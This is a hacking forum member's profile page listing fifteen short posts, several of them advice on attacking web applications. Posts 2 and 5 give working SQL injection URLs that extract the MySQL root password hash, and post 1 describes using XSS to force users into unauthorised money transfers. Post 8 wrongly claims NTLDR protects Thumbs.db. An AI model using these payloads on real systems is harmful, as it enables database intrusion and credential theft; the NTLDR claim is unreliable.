\xC3

Members
  • Content count

    67
  • Joined

  • Last visited

Community Reputation

0 Neutral

About \xC3

  • Rank
    HACK THE PLANET!

Contact Methods

  • Website URL
    http://www.wildcardsecurity.com/
  • ICQ
    0

Profile Information

  • Location
    Around the corner
  1. Since you can use javascript and jquery with XSS, one tactic you can use is kind of like session hijacking and cross site referral forgery: Because your XSS on the site has the site name in the referrer information, you can automate form submissions on the affected site in the context of the logged-in user. For example, if an attacker found an XSS vulnerability in a payment processing web site, the attacker could use the vulnerability to send a malicious link to a logged-in user, which would then (using jscript or jquery) force the logged-in user to send money to the attacker via a form submission. This would also bypass referrer checking in most cases because the domain name would be in the referrer URL. Click-n-pwn. NOTE: This is not something that I condone in any way. I am simply explaining the full potential of an XSS vulnerability.
  2. You may want to try some boolean enumeration. See if the following works: hxxp://*****.com/poll.php?id=1%20AND%201=1 hxxp://*****.com/poll.php?id=1%20AND%201=0 The first should return whatever is usually there, and I'm guessing that the second should make no "poll" display. If you get this far, you have a working true and false. If this is the case, then, hxxp://*****.com/poll.php?id=1%20AND%20((ASCII((MID((SELECT%20Password%20FROM%20mysql.user%20WHERE%20user='root'%20LIMIT%200,1),1,1))))>96) Will tell you if the ascii code of the first character of the password is greater than 96 (lowercase a or above). If this works, You'll want to break out an ascii chart to cross compare. You should be able to modify the above query to properly isolate the correct values. I am not 100% sure about MySQL 5.0, but I believe the hash to be stored in hexadecimal, meaning your possible ascii codes will be 97-102 (a-f) and 48-57 (0-9). You may also want to find the length of the hash with the following comparison: hxxp://*****.com/poll.php?id=1%20AND%20((LENGTH((SELECT%20Password%20FROM%20mysql.user%20WHERE%20user='root'%20LIMIT%200,1)))>10) This will "return true" if the length of the hash is greater than ten. Happy hacking. Hope this helped. EDIT: SQL Syntax EDIT: One more thing -- you may want to check out the grants table. This will tell you if it's A) world accessible or you have the privileges you want. Just a thought.
  3. If it were unary, there'd ONLY be 0. Binary (bi) from the latin (two) or language of two.. 0 and 1 are two different values, hence "binary". All data is stored in binary format. All ascii codes have there own binary equivilent. Same goes for hex, etc ad nauseam. All code executes in RAM or Cache as binary. All packets are formatted in binary at one layer or another, especially if you inspect such low level as ethernet frames etc. IP addresses are binary (in the packet level). As everything with a computer is deterministic, binary is what makes it so. The common thread, as it were.
  4. Wow. Judging from the fact that writing exploits is part of legitimate research for security firms, writing them shouldn't be illegal. I'd have to say using them on any gear other than your own is and should be, however writing them and testing them is a necessary part of vulnerability confirmation: If you discover a vulnerability in code, you are not 100% sure its vulnerable until you have written a test exploit. Even though this may only echo "I am vulnerable" back to the attacker, you've gotta do it as a researcher. Just part of life. Secondly, while I agree that viruses, released into the public, are both hazardous and problematic, and that releasing them, to the public, should be highly illegal: Many distributed computing systems and artificial intelligence research machines have very worm like properties about the way they distribute themselves across a network. Technically because certain behavioral patterns and codes are being copied and quantified, this too can be considered a virus. As a result, I /don't/ think that /writing/ anything should be illegal, simply deploying it into an environment which can allow it to affect anything outside of your own network should be strictly prohibited (and right now, as I see it, is). In any case, no one likes conficker, and if you're a researcher with /that much/ time on your hands, it might be worth the $250k to analyze and trace. Nmap has also made it somewhat easy to pinpoint infected machines. Does have some patch detection bugs though
  5. Well you may just want to try making it have an error. Usually if verbose errors are enabled it will freak out and give you the full path For example: hxxp://anysiterunningw0rdpr3s$.com/wp-settings.php Dig around for an includes directory or something. You can almost always get it to fork an error of some sort. EDIT: Seeing as your root, you may want to check out the mysql.user and the INFORMATION schema tables: Since you're using the particular versions that you are: http://dev.mysql.com/doc/refman/5.0/en/inf...ion-schema.html might even try : hxxp://*****.com/poll.php?id=1 union select null,null,(SELECT Password FROM mysql.user WHERE host='localhost' AND user='root'),null– hxxp://*****.com/poll.php?id=1 union select null,null,(SELECT Password FROM mysql.user WHERE user='root' LIMIT 1),null– (SELECT Password FROM mysql.user WHERE host='localhost' AND user='root') OR (SELECT Password FROM mysql.user WHERE user='root' LIMIT 1) May return a SQL 5.0 password hash, since you are running as root, after all.
  6. Because you're attacking the 'network' and not the 'host' or 'service' behind a 'port' you may want to think about the fact that networks are supported by network devices such as routers, switches, firewalls, NAC solutions, etc. Network devices generally use protocols like SNMP, OSPF, HSRP, RIP, CDP, STP, ICMP, BGP, and I'm sure there are plenty that I'm forgetting. These protocols all have RFC's or "Requests For Comment" that dictate the specifications for communication using these protocols. Most of the time, network vulnerabilities (as opposed to server or software based vulnerabilities) are a result of mis-configured network devices or design flaws in the protocol handlers. When unauthenticated instructions can be sent to a network device, sometimes the network device does what it's told. This can cause all sorts of things, for example, if you find a BGP abuse, then you can specify another router as the border gateway. Hope this helps.
  7. The best place to leave them is by the smoker's bench.
  8. Thumbs.db is protected by the standard windows file/memory protection mechanism, NTLDR, which is why explorer just re-attribs stuffs when you view the folder. You might be able to attrib -r -s -h NTLDR (I think its in the root of the system drive (C:)) and then delete it, but if you do that you throw all the other file protection out the window. You also might be able to apply a binary patch to explorer that prevents it from re-attrib'ing stuff. Hope this helps.
  9. I highly doubt that, because browsers work by sending a request to the DNS Server then they talk directly with the IP address in stead of using the domain or URL. If you want to spend time home-brewing an application, then I guess it would be possible by monitoring all the DNS requests and blocking traffic to IP Addresses which were not sent back from a DNS server. In any case, this is still easy to bypass.
  10. I don't have an iPod, but if you can ssh into it, you should be able to 'dd' the drive and create an image. Maybe pipe it through telnet or netcat with a listening port on your local machine that pipes it into a file...
  11. Hay! I'm heading out tonight, should be there around 9-10 PM.
  12. Yeah, I noticed that myself. There are a couple other threads I've seen from members that have recently joined that make me think binrev is currently being hit by hordes of trolls.
  13. I did a little research on that hosting site and they don't give you /too much/ space for free. makes me wonder if we could fill up his entire directory with like 50 mb of text logs so he can't do this stuff anymore..
  14. For starters, lets notice that the URL in the URL bar doesn't contain Binrev.com. Now here's to the code : <input type="hidden" name="act" value="Login" /> <input type="hidden" name="CODE" value="01" /> <input type="hidden" name="s" value="ece7a530afe53e91ae89129751338828" /> <input type="hidden" name="referer" value="http://www.binrev.com/forums/index.php?act=post&do=reply_post&f=5&t=38443" /> <input type="hidden" name="CookieDate" value="1" /> <h4>You are not logged in, you may log in below</h4> <div class="fieldwrap"> <h4>Your account username</h4> <input type="text" size="20" maxlength="64" name="UserName" /> <h4>Your account password</h4> <input type="password" size="20" name="PassWord" /> <p class="formbuttonrow1"><input class="button" type="submit" name="submit" value="Log In" /></p> </div> </form> First, lets notice that the form method is "GET" not "POST". The real code to the forum is as follows : <form action="http://www.binrev.com/forums/index.php?act=Login&CODE=01" method="post" name="LOGIN" onsubmit="return ValidateForm()"> <input type="hidden" name="referer" value="http://www.binrev.com/forums/index.php?" /> <div class="borderwrap"> <div class="maintitle"><img src='style_images/green/nav_m.gif' border='0' alt='>' width='8' height='8' /> Log In</div> <div class='row2'> <div class="formsubtitle">Please enter your details below to log in</div> <div class="errorwrap" style='margin-bottom:0px;padding-bottom:0px'> <h4>Attention!</h4> <p>You must already have registered for an account before you can log in.<br />If you do not have an account, you may register by clicking the 'register' link near the top of the screen</p> <p><b>I've forgotten my password! <a href="http://www.binrev.com/forums/index.php?act=Reg&CODE=10">Click here!</a></b></p> </div> </div> <table class='ipbtable' cellspacing="0"> <tr> <td width="60%" valign="top" class='row2'> <fieldset> <legend><b>Log In</b></legend> <table class='ipbtable' cellspacing="1"> <tr> <td width="50%"><b>Enter your user name</b></td> <td width="50%"><input type="text" size="25" maxlength="64" name="UserName" /></td> </tr> <tr> <td width="50%"><b>Enter your password</b></td> <td width="50%"><input type="password" size="25" name="PassWord" /></td> </tr> </table> </fieldset> </td> <td width="40%" valign="top" class='row2'> <fieldset> <legend><b>Options</b></legend> <table class='ipbtable' cellspacing="1"> <tr> <td width="10%"><input class='checkbox' type="checkbox" name="CookieDate" value="1" checked="checked" /></td> <td width="90%"><b>Remember me?</b><br /><span class="desc">This is not recommended for shared computers</span></td> </tr> <tr> <td width="10%"><input class='checkbox' type="checkbox" name="Privacy" value="1" /></td> <td width="90%"><b>Log in as invisible</b><br /><span class="desc">Don't add me to the active users list</span></td> </tr> </table> </fieldset> </td> </tr> <tr> <td class="formbuttonrow" colspan="2"><input class="button" type="submit" name="submit" value="Log me in" /></td> </tr> <tr> <td class="catend" colspan="2"><!-- no content --></td> </tr> </table> </div> </form> So I mean, look at the difference. Notice the action in the first code is "next.php" and that's not at all what the action is in the real src to the site. There are other differences between the codes, which I don't have to point out now - I'm sure its becoming readily apparent.
  15. This kid is a lame phisher.